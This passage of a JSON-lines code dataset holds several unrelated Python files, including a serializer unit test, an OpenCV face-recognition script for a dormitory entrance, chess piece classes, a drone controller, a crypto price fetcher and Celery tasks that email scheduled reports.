self.path_dir, self.json_files[6]))\n self.assertTrue(hasattr(complex_class, 'func_in_class'))\n complex_object = self.test_json_ser.load(path.join(\n self.path_dir, self.json_files[7]))\n self.assertEqual(complex_object.other.string, 'string')\n self.assertIsNone(self.test_json_ser.load('incorrect_path'))\n\n def test_loads(self):\n for value, answer_file in zip(self.data[:-4],\n self.answer_files[:-4]):\n with open(path.join(\n self.path_dir,\n answer_file), 'r') as rf:\n data_ = rf.read()\n self.assertEqual(\n self.test_json_ser.loads(data_), value\n )\n\n def get_data():\n for data_file in self.answer_files[4:]:\n with open(path.join(\n self.path_dir,\n data_file), 'r') as rf:\n data_ = rf.read()\n yield data_\n\n data_ = get_data()\n func = self.test_json_ser.loads(next(data_))\n self.assertEqual(func(12), 101)\n simple_class = self.test_json_ser.loads(next(data_))\n self.assertEqual(type(simple_class), type)\n complex_class = self.test_json_ser.loads(next(data_))\n self.assertTrue(hasattr(complex_class, 'func_in_class'))\n complex_object = self.test_json_ser.loads(next(data_))\n self.assertEqual(complex_object.other.string, 
'string')\n self.assertIsNone(self.test_json_ser.loads('bad_data'))\n\n\nif __name__ == \"__main__\":\n unittest.main()\n","sub_path":"lab2/serializer/tests/test_serializers/test_json_serializer.py","file_name":"test_json_serializer.py","file_ext":"py","file_size_in_byte":4157,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"245379270","text":"\nimport cv2\nfrom bootstrap import *\n\nimport logging as log\nimport datetime as dt\nfrom time import sleep\nfrom save_logs import *\nfrom image_recognition import *\nfrom db_management import *\nfrom camera_security import *\n\n\nanterior = 0\ncnt=0\n\nfaceCascade = cv2.CascadeClassifier(cascPath)\nbodyCascade = cv2.CascadeClassifier(cascPath_full_body)\n\n\n# TODO -> need to check in order to define overriding the images saved\n\ndef check_file_size(path):\n\n path = os.path.abspath(path)\n\n size = 0\n for e in os.scandir(path):\n if e.is_file():\n size += e.stat().st_size\n\n return size\n\n\ndef saveFaceImage(frame, x, y, w, h):\n sub_face = frame[y:y + h, x:x + w]\n FaceFileName = save_temp_images_path+'temp/'+\"face_\" + str(cnt) + \".jpg\"\n cv2.imwrite(FaceFileName, sub_face)\n return FaceFileName\n\n\n'''\n same the frame to the tmepFullImages\n'''\ndef saveWholeImage(frame):\n global cnt\n\n image_name = save_temp_images_path +'tmepFullImages/'+\"face_\" + str(cnt) + \".jpg\"\n\n cv2.imwrite(image_name, frame)\n cnt+=1\n\n return image_name\n\n\ndef checkForSimilarities(image_name):\n\n res = compare_TO_others_in_folder(image_name)\n\n if res is None:\n print('No face was detected')\n # send_image_to_main_server(image_name)\n send_image_to_main_server(image_name)\n\n os.remove(image_name)\n os.remove(tmpPath+image_name.split('/')[-1])\n return None\n if not res:\n return False\n\n else:\n # check for sql the name of the student with that image Name\n\n try:\n student_name = get_the_name_for_found_image_name(res)\n except Exception:\n print(\"Not found in the database\")\n save_messaes_to_logs('The student could ')\n # sendToServer({'data':\"An unregistered person entered the dromitory entrance\"})\n send_image_to_main_server(image_name)\n\n return False\n\n if len(student_name)==0:\n print('The student image was not found in the database')\n\n # sendToServer({'data':\"An unregistered person entered the dromitory entrance\"})\n send_image_to_main_server(image_name)\n\n else:\n\n print(\"The student name is : \"+student_name)\n\n # sendToServer({'data':\"An unregistered person entered the dormitory entrance\"})\n # send_image_to_main_server(image_name)\n\n return student_name\n\n\n\ndef processImages(faces,frame):\n global anterior\n\n # Draw a rectangle around the faces\n for (x, y, w, h) in faces:\n\n # save the images if the faces were found\n # saveFaceImage(frame, x, y, w, h)\n\n # check the width and the height of the rectangle to define, how close the face is\n if w >70 and h >70:\n # saveFaceImage(frame, x, y, w, h)\n cv2.rectangle(frame, (x - 10, y - 60), (x + w + 10, y + h + 20), (red, green, blue), border_size)\n # saveWholeImage(frame)\n img_name = saveFaceImage(frame,x,y,w,h)\n font = cv2.FONT_HERSHEY_SIMPLEX\n\n # write the student name -> returned from the image processing\n res = checkForSimilarities(saveWholeImage(frame))\n\n if res is None:\n continue\n\n if not res:\n # cv2.putText(frame,'Not Part of the Dorm',(x,y-5), font, 1, (200, 0,0), 1)\n save_log('Not a member',str(datetime.datetime.now()))\n\n # move the full image to the not Members Folder\n 
os.rename(tmpFullImages_path+img_name.split('/')[-1],not_members+img_name.split('/')[-1])\n\n\n\n else:\n # cv2.putText(frame, res, (x, y - 5), font, 1, (200, 0, 0), 1)\n save_log(res, str(datetime.datetime.now()))\n os.remove(img_name) # remove the image which exists as a member\n\n os.remove(tmpFullImages_path + img_name.split('/')[-1])\n\n\n if anterior != len(faces):\n anterior = len(faces)\n log.info(\"faces: \" + str(len(faces)) + \" at \" + str(dt.datetime.now()))\n\n\n\ndef start_imaging():\n\n save_start_end_log('', None)\n\n\n # configure the log\n # for every date a new log is going to be shown\n # log.basicConfig(filename='webcam.log', level=log.INFO)\n video_capture = cv2.VideoCapture(0)\n\n\n # using a stream video\n # video_capture.open(\"http://169.254.197.26/\")\n\n while True:\n\n if not video_capture.isOpened():\n print('Unable to load camera.')\n\n sleep(5)\n save_messaes_to_logs('Unable to load camera.')\n break\n\n # Capture frame-by-frame\n ret, frame = video_capture.read()\n\n gray = cv2.cvtColor(frame, cv2.COLOR_BGR2GRAY)\n\n faces = faceCascade.detectMultiScale(\n gray,\n scaleFactor=1.2,\n minNeighbors=5,\n minSize=(40, 40),\n flags=cv2.CASCADE_SCALE_IMAGE\n )\n\n\n # # upper_body\n # eye = bodyCascade.detectMultiScale(\n # gray,\n # scaleFactor=1.2,\n # minNeighbors=5,\n # minSize=(40, 40)\n # )\n\n isBlur = cv2.Laplacian(frame, cv2.CV_64F).var()\n\n # print()\n\n if isBlur >= 70 and len(faces)>0 :\n print('Checking')\n processImages(faces, frame)\n\n if cv2.waitKey(1) & 0xFF == ord('q'):\n save_start_end_log(None, '')\n video_capture.release()\n cv2.destroyAllWindows()\n exit(1)\n\n # Display the resulting frame\n cv2.imshow('Video', frame)\n\n # When everything is done, release the capture\n video_capture.release()\n cv2.destroyAllWindows()\n\n save_start_end_log(None,'')\n\n\n\n\n\n","sub_path":"src/read_from_camera.py","file_name":"read_from_camera.py","file_ext":"py","file_size_in_byte":5685,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"25091679","text":"\nimport texttable as tt\nfrom math import sqrt\n\n\n__author__ = 'javier'\n\n\ndef report(results):\n tab = tt.Texttable()\n tab.header(['Benchmark', 'Input', 'Average', 'std dev %', 'std dev', 'runs', 'discarded'])\n\n tab.set_cols_align(['r','r', 'r','r', 'r', 'r', 'r'])\n tab.set_deco(tab.HEADER | tab.VLINES)\n\n for benchmark, measures in sorted(results.items()):\n reportBenchmark(tab, benchmark, measures)\n\n table = tab.draw()\n print (table)\n\ndef reportBenchmark(tab, benchmark, measures):\n\n trimmed = trim_ends(sorted(measures), 0.1)\n runs = len(trimmed)\n average = sum(trimmed) / runs\n stddev = sqrt(sum([(measure - average)**2 for measure in trimmed]))\n stddev_relative = stddev / average * 100\n tab.add_row([benchmark.version, benchmark.value, average, \"%2.2f %%\" % stddev_relative, stddev, len(measures), len(measures) - runs])\n\n tab.set_cols_width([35, 10, 10, 10, 10, 10, 10])\n\ndef trim_ends(sorted_list, proportion_to_cut):\n\n size = len(sorted_list)\n left = int(proportion_to_cut * size)\n right = size - left\n\n return sorted_list[left:right]\n","sub_path":"BenchmarkReporter.py","file_name":"BenchmarkReporter.py","file_ext":"py","file_size_in_byte":1105,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"539941524","text":"# -*- coding: utf-8 -*-\nimport codecs\nimport re\nfrom collections import Counter\n\nlexicon = '/usr/local/data/arabsenti_lexicon.txt'\n\n# sentiment: # 
0=NEUT # 1=POS # 2=NEG\ntranslator = {'0': 0, '2': -1, '1': 1}\n\nlex = {}\nwith codecs.open(lexicon, encoding='utf-8', mode='r') as txt_fp:\n for line in txt_fp:\n arabic_dia, freq, sentiment, buck_dia, buck, arabic_no_ham, arabic_ham = map(unicode.strip, line.split(u'\\t'))\n if sentiment:\n # if arabic_dia in lex:\n # and lex[arabic_ham] != translator[sentiment]\n # print 'Already stored!', arabic_dia, lex[arabic_dia], 'new', translator[sentiment]\n lex[arabic_dia] = translator[sentiment]\n lex[arabic_ham] = translator[sentiment]\n lex[arabic_no_ham] = translator[sentiment]\n\n\ndef tokens(token_list):\n sentiments = Counter(lex.get(token) for token in token_list)\n return dict(pos=sentiments.get(1, 0), neg=sentiments.get(-1, 0), zero=sentiments.get(0, 0))\n\n\nwhitespace = re.compile(r'\\s+')\ndef document(text):\n return tokens(whitespace.split(text))\n\n# def write_js(stream):\n# lex_json = json.dumps(lex, ensure_ascii=False, indent=2, sort_keys=True)\n# stream.write(u'var arabsenti_lexicon = %s;\\n' % lex_json)\n# stream.write(u'''\n# function arabsenti(text) {\n# var tokens = text.split(/\\s+/);\n\n# var sum = 0, abs_sum = 0, count = 0;\n# tokens.forEach(function(token) {\n# var sentiment = arabsenti_lexicon[token];\n# if (sentiment !== undefined) {\n# sum += sentiment;\n# abs_sum += Math.abs(sentiment);\n# count++;\n# }\n# });\n# return {sum: sum, abs_sum: abs_sum, count: count, mean: parseFloat(sum) / count, };\n# }\n# ''')\n\n# if __name__ == '__main__':\n # write_js(sys.stdout)\n # with codecs.open(js, encoding='utf-8', mode='w') as js_fp:\n # write_js(js_fp)\n\n# var sum = function(vector) {\n# var accumulator = 0; vector.forEach(function (num) { accumulator += num; }); return accumulator; };\n# var abs_sum = function(vector) {\n# var accumulator = 0; vector.forEach(function (num) { accumulator += Math.abs(num); }); return accumulator; };\n","sub_path":"lexicons/arabsenti.py","file_name":"arabsenti.py","file_ext":"py","file_size_in_byte":2195,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"315737367","text":"import sys, os\nimport time\nfrom common import date_nid\nfrom common import settings\n\nwhile 1:\n nid = date_nid.nid_now()\n date = date_nid.nid_to_date(nid)\n logfile = '/data/ztf/logs/ztf_' + date + '_tns.log'\n\n py = settings.LASAIR_ROOT + 'anaconda3/envs/sherlock/bin/python '\n cmd = 'date >> %s;' % logfile\n cmd += py + settings.LASAIR_ROOT + 'lasair/src/post_ingest/poll_tns.py --pageSize=%d --inLastNumberOfDays=%d >> %s;' \n cmd = cmd % (settings.TNSpageSize, settings.TNSinLastNumberOfDays, logfile)\n cmd += py + settings.LASAIR_ROOT + 'lasair/src/alert_stream_ztf/common/run_tns_crossmatch.py >> %s' % logfile\n os.system(cmd)\n time.sleep(settings.TNSsleepTime)\n","sub_path":"src/alert_stream_ztf/tns_log.py","file_name":"tns_log.py","file_ext":"py","file_size_in_byte":694,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"618790791","text":"from tile import *\nfrom move import *\n\n#asciiart from:\n#http://www.retrojunkie.com/asciiart/sports/chess.htm\n\nclass Figure:\n figure_id = 0\n abreviation = ''\n\n black_ascii = ['.......',\n '.......',\n '.......',\n '.......']\n white_ascii = black_ascii\n\n def __init__(self, start_position, color, board=None):\n self.position = Tile.from_tuple(start_position)\n self.color = color.lower() == 'w'\n if board:\n self.board = board\n self.board.put_figure(self)\n\n @classmethod\n def get_figure_types(cls):\n return 
[NoFigure, Pawn, Rook, Knight, Queen, King, Bishop]\n\n @classmethod\n def from_number(cls, number, start_position):\n #even numbers are white, odd are black\n color = 'B'\n if number % 2 == 0:\n color = 'W'\n number = int(number / 2)\n for figure_type in cls.get_figure_types():\n if figure_type.figure_id == number:\n return figure_type(start_position, color)\n\n @classmethod\n def from_abreviation(cls, abreviation, start_position):\n color = 'B'\n if abreviation.upper() == abreviation:\n color = 'W'\n abreviation = abreviation.upper()\n for figure_type in cls.get_figure_types():\n if figure_type.abreviation == abreviation:\n return figure_type(start_position, color)\n\n def get_abreviation(self):\n if self.is_black():\n return self.abreviation.lower()\n return self.abreviation\n\n def set_board(self, board):\n self.board = board\n\n def all_moves(self):\n raise NotImplementedError()\n\n def controlled_tiles(self):\n raise NotImplementedError()\n\n def get_position(self):\n return self.position\n\n def set_position(self, new_position):\n self.position = new_position\n\n def get_color(self):\n return self.color\n\n def is_black(self):\n return not self.color\n\n def is_white(self):\n return self.color\n\n def x_position(self):\n return self.position.x\n\n def y_position(self):\n return self.position.y\n\n def as_ascii(self):\n if self.is_black():\n return self.black_ascii\n return self.white_ascii\n\n def is_free(self):\n return False\n\n def as_number(self):\n if self.is_white():\n return self.figure_id * 2\n return self.figure_id * 2 + 1\n\nclass NoFigure(Figure):\n def __init__(self, start_position=None, color=None, board=None):\n self.position = None\n return\n\n def all_moves(self):\n return []\n\n def is_white(self):\n return False\n\n def is_black(self):\n return False\n\n def is_free(self):\n return True\n\n def as_number(self):\n return 0\n\n\nclass Pawn(Figure):\n figure_id = 1\n abreviation = 'P'\n\n black_ascii = [r'..._...',\n r'..(#)..',\n r'../#\\..',\n r'.(###).']\n white_ascii = [r'..._...',\n r'..( )..',\n r'../ \\..',\n r'.(___).']\n\n def all_moves(self):\n direction = self.board.get_direction(self)\n moves = []\n if self.can_move_one(direction):\n moves.append(self.position + (0, direction))\n if self.can_move_two(direction):\n moves.append(self.position + (0, 2 * direction))\n if self.can_kill_left(direction):\n moves.append(self.position + (-1, direction))\n if self.can_kill_right(direction):\n moves.append(self.position + (1, direction))\n return moves\n\n def controlled_tiles(self):\n direction = self.board.get_direction(self)\n return [self.position + (1, direction),\n self.position + (-1, direction)]\n\n def can_move_one(self, direction):\n return self.board.tile_is_free(self.position + (0, direction))\n\n def can_move_two(self, direction):\n if not self.position.is_pawn_start(direction):\n return False\n if self.can_move_one(direction):\n return self.board.tile_is_free(self.position + (0, 2 * direction))\n\n def can_kill_left(self, direction):\n return self.board.is_enemy(self.position + (-1, direction), self)\n\n def can_kill_right(self, direction):\n return self.board.is_enemy(self.position + (1, direction), self)\n\n\nclass Knight(Figure):\n figure_id = 2\n abreviation = 'N'\n\n black_ascii = [r'..,-/|.',\n r'./_ )\\.',\n r'../#/\\.',\n r'.(###).']\n white_ascii = [r'..,-/|.',\n r'./_ )\\.',\n r'../ /\\.',\n r'.(___).']\n\n check_list = [(1, 2), (1, -2),\n (-1, 2), (-1, -2),\n (2, 1), (2, -1),\n (-2, 1), (-2, -1)]\n\n def controlled_tiles(self):\n return 
self.check_list\n\n    def all_moves(self):\n        moves = []\n        for point in self.check_list:\n            target = self.position + point\n            if (self.board.tile_is_free(target) or\n                self.board.is_enemy(target, self)):\n                moves.append(target)\n        return moves\n\n\nclass Rook(Figure):\n    figure_id = 3\n    abreviation = 'R'\n\n    black_ascii = [r'.[_|_].',\n                   r'..[#]..',\n                   r'..[#]..',\n                   r'.(###).']\n    white_ascii = [r'.[_|_].',\n                   r'..[ ]..',\n                   r'..[ ]..',\n                   r'.(___).']\n\n    paths = [[(0, i) for i in range(1, 8)],\n             [(0, -i) for i in range(1, 8)],\n             [(i, 0) for i in range(1, 8)],\n             [(-i, 0) for i in range(1, 8)]]\n\n    def controlled_tiles(self, path):\n        controlled = []\n        for point in path:\n            target = self.position + point\n            if not self.board.tile_is_free(target):\n                controlled.append(target)\n                break\n            controlled.append(target)\n        return controlled\n\n    def check_path(self, path):\n        reachable = []\n        for point in path:\n            target = self.position + point\n            if self.board.is_enemy(target, self):\n                reachable.append(target)\n                break\n            if not self.board.tile_is_free(target):\n                break\n            reachable.append(target)\n        return reachable\n\n    def all_moves(self):\n        moves = []\n        for p in self.paths:\n            moves.extend(self.check_path(p))\n        return moves\n\nclass Bishop(Rook):\n    figure_id = 4\n    abreviation = 'B'\n\n    black_ascii = [r'../|\\..',\n                   r'..\\|/..',\n                   r'..|#|..',\n                   r'.(###).']\n    white_ascii = [r'../|\\..',\n                   r'..\\|/..',\n                   r'..| |..',\n                   r'.(___).']\n\n    paths = [[(i, i) for i in range(1, 8)],\n             [(i, -i) for i in range(1, 8)],\n             [(-i, i) for i in range(1, 8)],\n             [(-i, -i) for i in range(1, 8)]]\n\n\nclass Queen(Rook):\n    figure_id = 5\n    abreviation = 'Q'\n\n    black_ascii = [r'..\\*/..',\n                   r'..(#)..',\n                   r'..)#(..',\n                   r'.(###).']\n    white_ascii = [r'..\\*/..',\n                   r'..( )..',\n                   r'..) (..',\n                   r'.(___).']\n\n    paths = [[(i, i) for i in range(1, 8)],\n             [(i, -i) for i in range(1, 8)],\n             [(-i, i) for i in range(1, 8)],\n             [(-i, -i) for i in range(1, 8)],\n             [(0, i) for i in range(1, 8)],\n             [(0, -i) for i in range(1, 8)],\n             [(i, 0) for i in range(1, 8)],\n             [(-i, 0) for i in range(1, 8)]]\n\n\nclass King(Knight):\n    figure_id = 6\n    abreviation = 'K'\n\n    black_ascii = [r'..\\+/..',\n                   r'..[#]..',\n                   r'..[#]..',\n                   r'.(###).']\n    white_ascii = [r'..\\+/..',\n                   r'..[ ]..',\n                   r'..[ ]..',\n                   r'.(___).']\n\n    check_list = [(-1, -1), (-1, 0), (-1, 1),\n                  (0, -1), (0, 1),\n                  (1, -1), (1, 0), (1, 1)]\n","sub_path":"figure.py","file_name":"figure.py","file_ext":"py","file_size_in_byte":8133,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"}
{"seq_id":"559986214","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat May 19 16:51:21 2018\n\n@author: xx\n\"\"\"\n\nimport pandas as pd\nimport ccxt\n\nALTS = [\"BCH\",\n\"BTG\",\n\"ETH\",\n\"XRP\",\n\"LTC\",\n\"ETC\",\n\"TRX\",\n\"OMG\",\n\"SNT\",\n\"ZRX\",\n\"KNC\",\n\"BAT\",\n\"FUN\",\n\"EOS\",\n]\nALTS2 = [\"SALT\"]\n#SYMBOLS = [x+\"/BTC\" for x in ALTS]\n\nexchange = ccxt.bitfinex2()\n#markets = exchange.load_markets()\ndf = pd.DataFrame(columns=['BTC PRICE', 'TIME'])\nfor alt in ALTS:\n    symbol = alt + \"/BTC\"\n    ticker_data = exchange.fetch_ticker(symbol)\n    df.loc[alt] = [ticker_data['last'], ticker_data['datetime']]\n    \nexchange2 = ccxt.binance()\nfor alt in ALTS2:\n    symbol = alt + \"/BTC\"\n    ticker_data = exchange2.fetch_ticker(symbol)\n    df.loc[alt] = [ticker_data['last'], 
ticker_data['datetime']]\n\ndf.to_excel(\"Alts_BTC_price\"+str(ticker_data['timestamp'])+\".xlsx\")\n","sub_path":"Alts_BTC_price.py","file_name":"Alts_BTC_price.py","file_ext":"py","file_size_in_byte":804,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"6088867","text":"import threading\nimport time\nfrom datetime import datetime\nimport cv2\nimport numpy as np\nfrom math import pi\n\nfrom sensors.cameraFilter import CameraFilter\nfrom parallelIce.navDataClient import NavDataClient\nfrom parallelIce.cmdvel import CMDVel\nfrom parallelIce.extra import Extra\nfrom parallelIce.pose3dClient import Pose3DClient\n\n\ntime_cycle = 80\ndetect = False\n\nclass MyAlgorithm(threading.Thread):\n class pid(object):\n def __init__(self, kp, kd, ki):\n # Constant of PID control\n self.kp = kp\n self.kd = kd\n self.ki = ki\n self.error = 0\n self.acumulate_error = 0\n\n def calculateU(self, e):\n proportional = self.kp * e\n derivate = self.kd * (e - self.error)\n self.acumulate_error = self.acumulate_error + e\n integral = self.ki * (self.acumulate_error)\n u = -(proportional) - (derivate) - (integral)\n self.error = e\n return u\n\n def __init__(self, camera, navdata, pose, cmdvel, extra):\n self.camera = camera\n self.navdata = navdata\n self.pose = pose\n self.cmdvel = cmdvel\n self.extra = extra\n self.minError=0.01\n\n # Constructor PID\n self.pidX = self.pid(2.655, 0.000112, 0.00029)\n self.pidY = self.pid(2.655, 0.000112, 0.00029)\n\n self.stop_event = threading.Event()\n self.kill_event = threading.Event()\n self.lock = threading.Lock()\n threading.Thread.__init__(self, args=self.stop_event)\n\n\n def run (self):\n\n self.stop_event.clear()\n\n while (not self.kill_event.is_set()):\n\n start_time = datetime.now()\n\n if not self.stop_event.is_set():\n self.execute()\n\n finish_Time = datetime.now()\n\n dt = finish_Time - start_time\n ms = (dt.days * 24 * 60 * 60 + dt.seconds) * 1000 + dt.microseconds / 1000.0\n #print (ms)\n if (ms < time_cycle):\n time.sleep((time_cycle - ms) / 1000.0)\n\n def stop (self):\n self.stop_event.set()\n\n def play (self):\n if self.is_alive():\n self.stop_event.clear()\n else:\n self.start()\n\n def kill (self):\n self.kill_event.set()\n\n def execute(self):\n # Add your code here\n global detec\n\n input_image = self.camera.getImage()\n\n if input_image is not None:\n blur = cv2.GaussianBlur(input_image, (3, 3), 0)\n color_HSV = cv2.cvtColor(blur, cv2.COLOR_RGB2HSV)\n\n H_max = 4.3*(180/(2*pi))\n H_min = 1.98*(180/(2*pi))\n S_max = 0.8*(255/1)\n S_min = 0.3*(255/1)\n V_max = 255.5\n V_min = 51.81\n\n bk_image = cv2.inRange(color_HSV, np.array([H_min,S_min,V_min]), np.array([H_max,S_max,V_max]))\n\n kernel = np.ones((19, 19), np.uint8)\n image_HSV_close = cv2.morphologyEx(bk_image, cv2.MORPH_CLOSE, kernel)\n self.camera.setThresoldImage(image_HSV_close)\n\n image_HSV_cp = np.copy(image_HSV_close)\n input_image_cp = np.copy(input_image)\n image, contours, hierarchy = cv2.findContours(image_HSV_close, cv2.RETR_LIST, cv2.CHAIN_APPROX_NONE)\n\n if contours is not None:\n cnt = contours[0]\n approx = cv2.approxPolyDP(cnt,0.1*cv2.arcLength(cnt,True),True)\n cnt_approx = cv2.approxPolyDP(cnt, 3, True);\n x,y,w,h = cv2.boundingRect(cnt_approx)\n image_contour = cv2.rectangle(input_image_cp,(x,y),(x+w,y+h),(0,255,0),2)\n self.camera.setColorImage(input_image_cp)\n detec = True\n else:\n self.camera.setColorImage(blur)\n\n if (detec == True):\n print (\"Turtle Detected\")\n # posicion central de la imagen en el filtro de 
color filter\n ini_pos = np.array([160, -90])\n coord_tur = np.array([x+w/2, -y+h/2])\n print (coord_tur)\n vect_1 = ini_pos - coord_tur\n vel_x = vect_1[0]*0.01\n vel_y = vect_1[1]*(-0.01)\n print (vel_x, vel_y)\n\n # clamp the velocities so the turtle does not escape\n # if vel_x > 0.6:\n # vel_x = 1.8\n # elif vel_x < -0.6:\n # vel_x = -1.8\n #\n # if vel_y > 0.6:\n # vel_y = 1.8\n # elif vel_y < -0.6:\n # vel_y = -1.8\n\n # send the velocity commands\n if abs(vel_x) < self.minError and abs(vel_y) < self.minError:\n self.cmdvel.sendCMDVel(0,0,0,0,0,0)\n print (\"Turtle Stop\")\n elif abs(vel_y) < self.minError and abs(vel_x) > self.minError:\n self.cmdvel.sendCMDVel(0,vel_x,0,0,0,0)\n print (\"Following X\")\n elif abs(vel_x) < self.minError and abs(vel_y) > self.minError:\n self.cmdvel.sendCMDVel(vel_y,0,0,0,0,0)\n print (\"Following Y\")\n else:\n self.cmdvel.sendCMDVel(vel_y,vel_x,0,0,0,0)\n print (\"Following turtle\")\n\n\n# if self.turtlebot_visual_field(contours):\n# # Calculating the error\n# errorx = (center[0] - img_center[0]) / 320\n# errory = (center[1] - img_center[1]) / 320\n#\n# # PID controller\n# controladorX = self.pidX.calculateU(errorx)\n# controladorY = self.pidY.calculateU(errory)\n# # print (\"error\", errorx, errory)\n# # print (\"controller\", controladorX, controladorY)\n#\n# # Correct position\n# if (abs(errorx) <= self.minError) and (abs(errory) >= self.minError):\n# self.cmdvel.sendCMDVel(1.5 * controladorY, 0, 0, 0, 0, 0)\n# print (\"Following turtle on Y\")\n# if (abs(errorx) >= self.minError) and (abs(errory) <= self.minError):\n# self.cmdvel.sendCMDVel(0, 1.5 * controladorX, 0, 0, 0, 0)\n# print (\"Following turtle on X\")\n# if (abs(errorx) >= self.minError) and (abs(errory) >= self.minError):\n# self.cmdvel.sendCMDVel(1.5 * controladorY, 1.5 * controladorX, 0, 0, 0, 0)\n# print (\"Following turtle on X and Y\")\n# elif (abs(errorx) <= self.minError) and (abs(errory) <= self.minError):\n# # If the margin is minimum, then we have got the target\n# # The acumulate error is zero\n# self.pidX.acumulate_error = 0\n# self.pidY.acumulate_error = 0\n# self.cmdvel.sendCMDVel(0, 0, 0, 0, 0, 0)\n# print (\"Turtle Stop\")\n#\n# else:\n# # Climb up to see the turtlebot\n# self.cmdvel.sendCMDVel(0, 0, 0.2, 0, 0, 0)\n# pass\n# print (\"Turtle not on image\")\n","sub_path":"jderobot exercises/tortuga/MyAlgorithm.py","file_name":"MyAlgorithm.py","file_ext":"py","file_size_in_byte":7051,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"173793474","text":"#!/usr/bin/python3\n# -*- coding:utf-8 -*-\nfrom collections import defaultdict, Counter\nfrom typing import List\n\n\nclass Solution:\n def totalFruit(self, tree: List[int]) -> int:\n def atMost(k, nums):\n i = ans = 0\n win = defaultdict(lambda: 0)\n for j in range(len(nums)):\n if win[nums[j]] == 0:\n k -= 1\n win[nums[j]] += 1\n while k < 0:\n win[nums[i]] -= 1\n if win[nums[i]] == 0:\n k += 1\n i += 1\n ans = max(ans, j - i + 1)\n return ans\n\n return atMost(2, tree)\n\n def totalFruit2(self, tree: List[int]) -> int:\n n = len(tree)\n seen = Counter()\n l = 0\n r = 0\n res = 0\n while r < n:\n if len(seen) == 2 and tree[r] not in seen:\n res = max(res, r - l)\n for t in seen:\n if t != tree[r - 1]:\n break\n l = seen[t] + 1\n seen.pop(t)\n seen[tree[r]] = r\n r += 1\n return max(res, r - l)\n\n\nif __name__ == '__main__':\n s = Solution()\n tree = [1, 2, 3, 2, 2] # 4\n print(s.totalFruit(tree))\n 
print(s.totalFruit2(tree))\n","sub_path":"双指针/904.py","file_name":"904.py","file_ext":"py","file_size_in_byte":1315,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"595287281","text":"from .celery_utils import celery_app\nfrom .sendemail import SendMail\n\nfrom app.reports_sql import (\n OrionReportAccessPoint, UnpackData, OrionReportWalkwaysPerson,\n OrionReportViolations, OrionReportFirtsLast\n)\n\nfrom datetime import datetime, timedelta\nfrom calendar import monthrange\nfrom dateutil.relativedelta import relativedelta\n\nfrom app.xlsx_ import SaveReport\n\nfrom app.db import get_db_no_g\n\nimport os\n\n# Helper datetime function\ndef dt_tw(wday):\n # Monday\n today = datetime.today()\n mon = today - timedelta(days = datetime.isoweekday(today)-1)\n if wday == 'm':\n return mon\n # Sunday\n if wday == 's':\n sun = mon + timedelta(days = 6)\n return sun\n # Today\n if wday == 't':\n return today\n\n\n# This task called by create_mail_task to create periodicaly task by schedule.\n@celery_app.task\ndef send_mail_task(id, report_id, recipient, periodicity, time, filename,\n weekday=None, date=None):\n\n db = get_db_no_g()\n\n row = db.execute(\"SELECT id, report_type, name, period,\\\n data FROM saved_reports WHERE id = ?\",\n (report_id,)).fetchone()\n if row:\n\n # Calculate time intervals\n if row['period'] == 'Previous week':\n date_start = (dt_tw('m') - timedelta(days = 7)).replace(hour=0, minute=0, second=0)\n date_end = (date_start + timedelta(days = 6)).replace(hour=23, minute=59, second=59)\n\n elif row['period'] == 'Previous day':\n date_start = dt_tw('t').replace(hour=0, minute=0, second=0) - timedelta(days=1)\n date_end = date_start.replace(hour=23, minute=59, second=59)\n\n elif row['period'] == 'Previous month':\n date_start = dt_tw('t').replace(day=1, hour=0, minute=0, second=0) - relativedelta(months = 1)\n # Last day of current month\n last_day = monthrange(date_start.year, date_start.month)[1]\n date_end = date_start.replace(day=last_day, hour=23, minute=59, second=59)\n\n # For person\n if row['report_type'] == 'Person':\n persons_id = row['data']\n data = UnpackData(OrionReportWalkwaysPerson(date_start, date_end, persons_id))\n\n # For access point\n elif row['report_type'] == 'Access point':\n ap = eval(row['data'])['ap']\n events = eval(row['data'])['events']\n data = UnpackData(OrionReportAccessPoint(date_start, date_end, ap, events))\n\n # For violations\n elif row['report_type'] == 'Violations':\n ap = row['data']\n data = UnpackData(OrionReportViolations(date_start, date_end, ap))\n\n # For first-last\n elif row['report_type'] == 'First-Last':\n persons_id = row['data'].split(',') # \n data = OrionReportFirtsLast(date_start, date_end, persons_id)\n\n xlsxfile = SaveReport(date_start, date_end, data, row['name'])\n subj = f\"Automatic report system. Report: \\\"{row['name']}\\\", generated at {datetime.now().isoformat()}\"\n\n mail_obj = SendMail(filename, xlsxfile, 'orion@localhost', recipient, subj)\n mail_obj.start()\n return\n\n# This task starts by schedule of celery beat, configured in celery_utils.py.\n# Default time startup - daily, at 00:00. 
This task selects mail task from\n# mail_task table and load today tasks to celery queue calling send_mail_task.apply_async()\n# method.\n@celery_app.task\ndef create_mail_task():\n from calendar import day_name\n\n celery_id = None\n\n db = get_db_no_g()\n cursor = db.execute(\"SELECT id, user_id, report_id, recipient,\\\n periodicity, time, weekday, date FROM mail_task;\"\n )\n row = cursor.fetchone()\n week_days = list(day_name)\n while row:\n now = datetime.now()\n countdown = now - now\n\n # To datetime format\n t = datetime.strptime(row['time'], '%H:%M:%S').time()\n\n if row['periodicity'] == 'daily':\n days = timedelta(days=0)\n elif row['periodicity'] == 'weekly':\n # Count days\n days = (week_days.index(row['weekday']) - datetime.weekday(now) + 7) % 7\n days = timedelta(days=days)\n elif row['periodicity'] == 'monthly':\n if row['date'] == now.day:\n days = timedelta(days=0)\n else:\n days = timedelta(days=-1)\n\n # Count timedelta\n countdown = ((now + days).replace(hour=t.hour, minute=t.minute, second=t.second)\n - now)\n\n\n # Do not create task if timedelta more than 86400 sec(24 hour)\n countdown = countdown.total_seconds()\n if countdown > 0 and countdown < 